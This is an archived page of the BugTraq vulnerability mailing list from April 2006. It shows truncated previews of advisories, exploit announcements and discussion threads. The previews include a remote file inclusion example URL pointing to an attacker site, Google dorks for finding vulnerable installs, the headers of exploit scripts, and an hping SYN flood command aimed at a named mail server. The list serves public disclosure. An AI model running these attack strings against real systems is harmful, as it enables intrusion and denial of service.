BugTraq Mode:
(Page 1162 of 1748)  < Prev  1157 1158 1159 1160 1161 1162 1163 1164 1165 1166 1167  Next >
axoverzicht.cgi<==Remote File Inclusion 2006-04-20
CrAzY CrAcKeR hotmail com
foud by::::.CrAzY CrAcKeR.:::::

Site: http://www.alshmokh.com

nono225-mHOn-rageh-port-Lover hacker-Breeeeh

#################################

-------example:
http://[target].com/path/axoverzicht.cgi?maand=http://evilsite

--------google:
inurl:"axoverzicht.cgi?maand";

[ more ]  [ reply ]
ThWboard 3 Beta 2.84 Cross Site Scripting 2006-04-20
CrAzY CrAcKeR hotmail com
foud by:::.CrAzY CrAcKeR & Breeeh.:::

Site: http://www.alshmokh.com

nono225-mHOn-rageh-port-Lover hacker

#################################

-----example:

http://target.com/forum/index.php?navpath=[XSS]

[ more ]  [ reply ]
PHPSurveyor <= 0.995 'save.php/surveyid' remote cmmnds xctn 2006-04-20
rgod autistici org
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "********************************************************************\r\
n";
echo "* PHPSurveyor <= 0.995 'save.php/surveyid' remote cmmnds xctn *\r\n";
echo "* by rgod rgod (at) autistici (dot) org [email concealed] site: http://retrogod.altervista.org *\r\n";
echo "* a speci

[ more ]  [ reply ]
[eVuln] MWGuest XSS Vulnerability 2006-04-20
alex evuln com
New eVuln Advisory:
MWGuest XSS Vulnerability
http://evuln.com/vulns/122/summary.html

--------------------Summary----------------
eVuln ID: EV0122
Vendor: Manic Web
Software: MWGuest
Sowtware's Web Site: http://www.manicweb.co.uk/
Versions: 2.1.0
Critical Level: Harmless
Type: Cross-Site Scripting

[ more ]  [ reply ]
ASPSitem <= 1.83 Remote SQL Injection Vulnerability 2006-04-19
Mustafa Can Bjorn IPEKCI (nukedx nukedx com)

--Security Report--
Advisory: ASPSitem <= 1.83 Remote SQL Injection Vulnerability.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 19/04/06 19:33 PM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx (at) nukedx (dot) com [email concealed]
Web: http://www.nukedx.com
}
---
Vendor: ASPSitem (http://www.aspsitem.com)

[ more ]  [ reply ]
Strengthen OpenSSH security? 2006-04-18
Brett Glass (brett lariat org)
I'm sure that most folks with hosts that expose an OpenSSH daemon
to the Internet have been getting the usual probes and password
guessing attempts and have been taking appropriate actions (e.g.
setting AllowUsers and using strong passwords) to protect
yourselves. But today, on one of my servers

[ more ]  [ reply ]
SQL Injection in incredibleindia.org 2006-04-16
susam_pal yahoo co in
Vulnerable Page: http://www.incredibleindia.org/newsite/cms_Page.asp

Found By: Susam Pal

Found On: 29th March, 2006, Wednesday

Vulnerability Type: SQL Injection

Action Taken: Reported to admin (at) incredibleindia (dot) org [email concealed]

Description:

www.incredibleindia.org is a tourism website. The site is prone to S

[ more ]  [ reply ]
Re: Re: [Full-disclosure] Microsoft DNS resolver: deliberately sabotaged hosts-file lookup 2006-04-16
somerandomaddress99 mailinator com
FYI: go.microsoft.com is used to point to security bulletins.

In fact, all the domains listed with the exception of MSN.com are used in the Windows and Office patching process.

[ more ]  [ reply ]
[USN-271-1] Firefox vulnerabilities 2006-04-19
Martin Pitt (martin pitt canonical com)
===========================================================
Ubuntu Security Notice USN-271-1 April 19, 2006
mozilla-firefox, firefox vulnerabilities
CVE-2005-4134, CVE-2006-0292, CVE-2006-0296, CVE-2006-0749,
CVE-2006-1727, CVE-2006-1728, CVE-2006-1729, CVE-2006-1730,
CVE-2006-1731, CVE-2006-17

[ more ]  [ reply ]
EasyGallery Cross-Site Scripting 2006-04-19
botan linuxmail org
Website : www.wingnut.net.ms
Author : Botan
Credits : B3g0k,Nistiman,flot,Netqurd
Original Advisory :

http://advisory.patriotichackers.com/index.php?itemid=5

Description : "EasyGallery is a simple web-photogallery with a maximum of user-friendlyness. All you have to do is to upload your photos an

[ more ]  [ reply ]
[eVuln] MD News Authentication Bypass and SQL Injection Vulnerabilities 2006-04-18
alex evuln com
New eVuln Advisory:
MD News Authentication Bypass and SQL Injection Vulnerabilities
http://evuln.com/vulns/120/summary.html

--------------------Summary----------------
eVuln ID: EV0120
Software: MD News
Sowtware's Web Site: http://www.matthewdingley.co.uk/
Versions: 1
Critical Level: Moderate
Type:

[ more ]  [ reply ]
Confixx SQL Injection exploit (confixx_exploit.pl) 2006-04-19
defa (defa systemli org)
Well - the patch is out - here is the exploit.

Hey - German hosters - if you call yourself "serverkompetenz.de" -
why don't you fix your servers?

sincerly
defa

----BOF----
#!/usr/bin/perl

########################################################################

########
# #
# e

[ more ]  [ reply ]
Re: RE: [Full-disclosure] Microsoft DNS resolver: deliberately sabotagedhosts-file lookup 2006-04-16
somebody rtr ca
Just take a binary editor to dnsapi.dll and change the strings to .ccc instead of .com

That should fix it, until the next update cycle.

[ more ]  [ reply ]
Tlen.PL e-mail XSS vulnerability. 2006-04-15
koper pass pl
As written in: http://security.pass.pl/adv/160406_XSS_tlen_pl.txt

::File: 060416_XSS_tlen_pl
::Date: 16 Feb 2006
::Author: Tomasz Koperski <koper (at) pass (dot) pl [email concealed]>
::URL: http://security.pass.pl

::1::Overview::
Tlen.PL e-mail system is affected to cross-site scripting vulnerability, not validating HTML t

[ more ]  [ reply ]
Re: [Full-disclosure] Microsoft DNS resolver: deliberately sabotagedhosts-file lookup 2006-04-16
no spam my house
Obnoxious, sure, but not hard to beat. (Assuming for some insane reason you are actually still using Windows for anything other than playing games)

You just add an entry in your DNS server with a zone matching the hostname that you want to override. And if they have the IP addresses of MSFT-control

[ more ]  [ reply ]
RE: redirection vuln crawlers breed & security through obscurity 2006-04-19
Evans, Arian (Arian Evans fishnetsecurity com)
1. This is definitely a pretty common, if not well-known
problem, being "broken access control" that relies on
obscurity or something weak/trivial to forge (like an
HTTP refer field path) to control access to an entry
point in a webapp. Sometimes, no further authorization
checks are made (on pages/f

[ more ]  [ reply ]
Fortinet28 box does not resist has small synflood! 2006-04-16
testx444 hushmail com
Fortinet28 box does not resist has small synflood on smtp port!
ips protection is not effective because there is not enough syn!
hping -i u10 -p 25 -S mail.fortinet.com

Concerned about your privacy? Instantly send FREE secure email, no account required
http://www.hushmail.com/send?l=480

Get the

[ more ]  [ reply ]
Re: RE: [Full-disclosure] Microsoft DNS resolver: deliberately sabotagedhosts-file lookup 2006-04-17
john johnsdomain org
The XP DNS client has other problems as well. It caches DNS failiures (arguably out of spec with the RFC, BTW), screwing up VPNs if you're VPNed into an internet network that has local domains which need to resolve to RFC1918 addresses. The cached failed lookups get prefered to forced entries in t

[ more ]  [ reply ]
WWWThread RC 3 MultBugs 2006-04-19
o y 6 hotmail com
[code]// --- WWWThread RC 3 MultBugs --- //

* D3vil-0x1 | Devil-00
* www.securitygurus.net
* Gr33tz
- HACKERS PAL | n0m3rcy | -

&
All Others << i forgot them :))

//---------------------------------//

//---------------------------------// [ Bug 1 ] //-

[ more ]  [ reply ]
Re: [Full-disclosure] Microsoft DNS resolver: deliberately sabotagedhosts-file lookup 2006-04-17
robsekeris hotmail com
After reading your scary message, went to verify your points and confirmed all. Whilst, as I've been running a real software firewall (Sunbelt Kerio Personal Firewall is for free) on top of a router firewall, I've been able to block or force a request as I see fit for each of these sites. On WMP, un

[ more ]  [ reply ]
Re: Multiple Vulnerabilities in LucidCMS 2006-04-18
zachofalltrades sourceforge net
these vulnerabilites are dealt with for the next release candidate (RC6)

[ more ]  [ reply ]
redirection vuln crawlers breed & security through obscurity 2006-04-15
Ivan Sergio Borgonovo (mail webthatworks it)
I just came across such kind of code (php) written by a colegue:

//header.inc
if($_SESSION['UN']!='hardcoded_UN' or $_SESSION['UN']!='hardcoded_PW')
header("Location: ./login.html");
//missing else to mitigate the problem!!
//HTML stuff here...

code structure of all the other "supposed to be" pri

[ more ]  [ reply ]
PCPIN Chat <= 5.0.4 "login/language" remote cmmnds xctn 2006-04-19
rgod autistici org
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "PCPIN Chat <= 5.0.4 \"login/language\" remote cmmnds xctn\r\n";
echo "by rgod rgod (at) autistici (dot) org [email concealed]\r\n";
echo "site: http://retrogod.altervista.org\r\n\r\n";
echo "-> works with magic_quotes_gpc = Off\r\n";
echo "dork: \"powered by PCPIN.com\"\r\n\r\n";

[ more ]  [ reply ]
(Page 1162 of 1748)  < Prev  1157 1158 1159 1160 1161 1162 1163 1164 1165 1166 1167  Next >


 

Privacy Statement
Copyright 2010, SecurityFocus